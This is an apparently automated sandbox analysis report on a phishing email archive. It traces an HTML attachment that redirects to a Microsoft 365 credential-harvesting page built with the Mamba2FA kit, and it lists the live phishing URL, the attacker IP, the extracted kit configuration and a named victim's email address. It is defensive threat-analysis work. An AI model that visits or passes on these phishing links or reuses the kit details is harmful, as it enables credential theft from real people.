Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rob.Kuster@stonhard.com.zip

Overview

General Information

Sample name:Rob.Kuster@stonhard.com.zip
Analysis ID:1542420
MD5:d3399bfa41bf597bc09c1937d775e685
SHA1:69606947338e9c0c5090e4b0b8b84a03b9d6e67f
SHA256:5365a73cc664ffa93fa4f308c69b4f3f5961a9cb253186faef681f74ef104f7f
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
HTML page contains suspicious javascript code
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Creates a window with clipboard capturing capabilities
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid 'forgot password' link found
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 1488 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 7072 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\AppData\Local\Temp\Temp1_Rob.Kuster@stonhard.com.zip\Rob.Kuster@stonhard.com (Primary)\Recoverable Items\Purges\ACH Released 10%2F2%2F2024 Ref.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6432 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "131B3A01-507D-4266-80B2-B5528E4A4C4D" "0CD3F6DC-211C-46EC-89D2-436A5971245B" "7072" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 2292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1844,i,6784266776184120549,4847810179203446940,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • notepad.exe (PID: 6196 cmdline: "C:\Windows\system32\notepad.exe" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

Threatname: Mamba2FA

{"sv": "o365_1_nom", "rand": "NWd2QWc=", "uid": "USER15092024U10091510"}

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

          Sigma Signatures

          Sigma detected: Office Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
          Sigma detected: Outlook Security Settings Updated - Registry
          Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-25T22:23:33.475978+020020563161Successful Credential Theft Detected192.168.2.1649738185.45.66.155443TCP
          2024-10-25T22:23:35.620357+020020563161Successful Credential Theft Detected192.168.2.1649740185.45.66.155443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-25T22:23:31.945805+020020566432Possible Social Engineering Attempted192.168.2.1649735185.45.66.155443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
          Found malware configuration
          Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "NWd2QWc=", "uid": "USER15092024U10091510"}

          Phishing

          barindex
          AI detected phishing page
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=LLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'marty-n.com' does not match the legitimate domain 'microsoft.com'., The URL contains a hyphen and does not resemble any known Microsoft subdomains or services., The URL does not have any direct association with Microsoft, which is a red flag for phishing., The presence of a CAPTCHA ('I'm not a robot') is common in phishing sites to bypass automated detection. DOM: 1.1.pages.csv
          Yara detected HtmlPhish10
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Yara detected Mamba 2FA PaaS
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          HTML page contains suspicious javascript code
          Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/P6FSC57M/ATT47968.htmHTTP Parser: window.location.href = atob(
          Phishing site detected (based on image similarity)
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=Matcher: Found strong image similarity, brand: MICROSOFT
          Phishing site detected (based on logo match)
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=Matcher: Template: microsoft matched
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Number of links: 0
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Title: Authenticating ... does not match URL
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Invalid link: Forgot password?
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Invalid link: Terms of use
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Invalid link: Privacy & cookies
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Invalid link: Terms of use
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: Invalid link: Privacy & cookies
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: <input type="password" .../> found
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No favicon
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No favicon
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No <meta name="author".. found
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No <meta name="author".. found
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No <meta name="copyright".. found
          Source: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.236.24.53:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.236.24.53:443 -> 192.168.2.16:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 51.104.34.11:443 -> 192.168.2.16:49766 version: TLS 1.2

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49738 -> 185.45.66.155:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49740 -> 185.45.66.155:443
          Source: Joe Sandbox ViewIP Address: 185.45.66.155 185.45.66.155
          Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
          Source: Joe Sandbox ViewIP Address: 18.245.31.78 18.245.31.78
          Source: Joe Sandbox ViewIP Address: 192.229.133.221 192.229.133.221
          Source: Joe Sandbox ViewASN Name: SUPERHOSTING_ASBG SUPERHOSTING_ASBG
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49735 -> 185.45.66.155:443
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mWVXAUOklGATDsF&MD=Pwwdf8r8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mWVXAUOklGATDsF&MD=Pwwdf8r8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitOrigin: https://www.bing.comAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /rb/17/jnc,nj/6aa-EF2IAVwnTTOiwAbhwI_VmCw.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=n&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=255fd2e3c36e408db16aa032974197e2 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1729887742X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=not&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=a2f0055f6109415bbee1573a5e0f2c13 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1729887742X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=no&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=b9ae87fe0bf14bbfae069d851afbb55d HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1729887742X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: 